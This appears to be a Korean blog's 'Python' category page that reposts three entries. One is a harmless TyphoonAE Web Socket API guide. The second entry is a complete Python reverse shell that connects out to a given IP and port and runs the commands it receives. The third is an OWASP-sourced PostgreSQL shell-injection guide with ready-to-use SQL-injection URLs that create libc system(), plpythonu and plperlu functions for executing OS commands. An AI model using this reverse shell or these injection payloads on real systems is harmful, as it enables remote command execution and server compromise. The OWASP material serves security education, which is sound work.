'Python'에 해당되는 글 5건

  1. 2014.02.04 Web Socket API
  2. 2010.09.10 윈도우 환경 Python 쉘 리바운드
  3. 2010.08.05 PostgreSQL Shell Injection
2014. 2. 4. 19:13

Web Socket API

Web Socket API

The Web Socket protocol enables web applications to maintain bidirectional communications with server-side processes. The typhoonae.websocket package provides a Web Socket Service API for GAE applications. It was introduced by the TyphoonAE 0.1.2 release anddoes not run on the productive Google App Engine platform.

However, in order to enable the Web Socket API for the Google App Engine SDK, go through the following guide.

Patching the Google App Engine SDK (Python) to enable TyphoonAE's Web Socket API

To get an idea how Web Sockets could work with GAE download the SDK 1.5.0 patch from this location. It also includes a demo app and some basic instructions.

Web Borwsers Supporting Web Sockets

Overview

Since Bret Taylor came up with a neat implementation of a Web Socket handler for the Tornado web server, it's no longer a hassle to get an experimental Web Socket service up and running. A client can establish a Web Socket connection to the service which solely utilizes web hooks to dispatch messages to and from an application.


A client requests (1) a web page containing the Java Script call to establish a Web Socket connection (2) to a URL provided by the application. The application and Web Socket service communicate over web hooks (3, 4).

Sending and Receiving Web Socket Messages

We distinguish between two types of incoming Web Socket messages. A handshake message is received once per Web Socket session when the client establishes the connection. This type of message can be handled seperately by a request handler. All other incoming messages can be handled by another request handler. The API we use in our handshake handler as well as in the handler for all other incoming Web Socket messages doesn't differ. However, in many cases it is very useful to handle Web Socket handshake messages seperately from normalmessages.

In order to handle incoming Web Socket requests, add this script handler to the handlers section of the app.yaml file.

  - url: /_ah/websocket/.*
    script
: script.py
    login
: admin

Define the correct URL mapping for your WSGI application:

  app = google.appengine.ext.webapp.WSGIApplication([
   
('/_ah/websocket/handshake/(.*)', HandshakeHandler),
   
('/_ah/websocket/message/(.*)', MessageHandler),
 
], debug=True)

Our Web Socket API provides a convenience function to obtain the appropriate service URL. It has one argument for additional URI information:

  websocket_url = typhoonae.websocket.create_websocket_url('/foo/bar')

The following request handler receives and sends messages from and to a Web Socket. The POST method is used to receive an incoming message where the first non-self argument contains the additional URI information from above:

  class MessageHandler(google.appengine.ext.webapp.RequestHandler):
   
"""Handles Web Socket requests."""

   
def post(self, path):
      message
= typhoonae.websocket.Message(self.request.POST)
      typhoonae
.websocket.send_message(
       
[message.socket], 'Received: "%s"' % message.body)

message object has the two attributes socket and body. The former is a string containing the socket id. The latter contains our message body as a unicode string.

The client, usually a Web Socket capable browser, establishes a Web Socket by using Java Script:

  ws = new WebSocket("ws://example.com");

Broadcast Messages

TyphoonAE adds another very useful function which enables an app to broadcast messages to all currently open Web Sockets of an app. Without this convenient method a developer has to implement a solution to remember all open Web Sockets. By using broadcast_message the Web Socket service takes care of it.

  class MessageHandler(google.appengine.ext.webapp.RequestHandler):
   
"""Handles Web Socket requests."""

   
def post(self, path):
      message
= typhoonae.websocket.Message(self.request.POST)
      typhoonae
.websocket.broadcast_message(message.body)

Handling Closed Sockets

Applications sometimes should be informed when a socket is closed. Therefore, an app can implement a third request handler for the following URL pattern:

    '/_ah/websocket/closed/(.*)'

The success path can be utilized for keeping track of additional informations such as encoded user IDs.

  class SocketClosedHandler(google.appengine.ext.webapp.RequestHandler):
   
"""Handler for socket closed events."""

   
def post(self, path):
      user
= decode_user_from_path(path)
      typhoonae
.websocket.broadcast_message('%s has left the building' % user)

See http://dev.w3.org/html5/websockets/ for further information on Web Sockets.




출처 : code.google.com


Trackback 0 Comment 0
2010. 9. 10. 11:41

윈도우 환경 Python 쉘 리바운드

#!/usr/bin/python import socket import sys import os def usage(): print "Simple Python Backconnect Shell" print "Usage:" print "./bc.py [ip] [port]" quit() #Initialize socket s = socket.socket() #Check if required arguments have been filled try: ip = sys.argv[1] port = int(sys.argv[2]) except: usage() #Connect to given target IP & port try: s.connect((ip, port)) except: print "Connection Failed! Check your connection settings and try again." quit() while(1): data = s.recv(1024) if(data == 'quit\n'): s.close() break else: shell = os.popen(data).read() s.send(shell) print "Exiting..." s.close() #Author: OrderZero

Trackback 0 Comment 0
2010. 8. 5. 15:19

PostgreSQL Shell Injection

Shell Injection

PostgreSQL provides a mechanism to add custom functions by using both Dynamic Library and scripting languages such as python, perl, and tcl.

Dynamic Library

Until PostgreSQL 8.1, it was possible to add a custom function linked with libc:

  • CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Since system returns an int how we can fetch results from system stdout?

Here's a little trick:

  • create a stdout table
    CREATE TABLE stdout(id serial, system_out text)
  • executing a shell command redirecting its stdout
    SELECT system('uname -a > /tmp/test')
  • use a COPY statements to push output of previous command in stdout table
    COPY stdout(system_out) FROM '/tmp/test'
  • retrieve output from stdout
    SELECT system_out FROM stdout

Example:

 
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

plpython

PL/Python allows users to code PostgreSQL functions in python. It's untrusted so there is no way to restrict what user can do. It's not installed by default and can be enabled on a given database by CREATELANG

  • Check if PL/Python has been enabled on a database:
    SELECT count(*) FROM pg_language WHERE lanname='plpythonu'
  • If not, try to enable:
    CREATE LANGUAGE plpythonu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read() 'LANGUAGE plpythonu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS ‘import os; return os.popen(args[0]).read()’ LANGUAGE plpythonu;--
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--

plperl

Plperl allows us to code PostgreSQL functions in perl. Normally, it is installed as a trusted language in order to disable runtime execution of operations that interact with the underlying operating system, such as open. By doing so, it's impossible to gain OS-level access. To successfully inject a proxyshell like function, we need to install the untrusted version from the postgres user, to avoid the so-called application mask filtering of trusted/untrusted operations.

  • Check if PL/perl-untrusted has been enabled:
    SELECT count(*) FROM pg_language WHERE lanname='plperlu'
  • If not, assuming that sysadm has already installed the plperl package, try :
    CREATE LANGUAGE plperlu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu;
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--


출처 : www.owasp.org

Trackback 0 Comment 0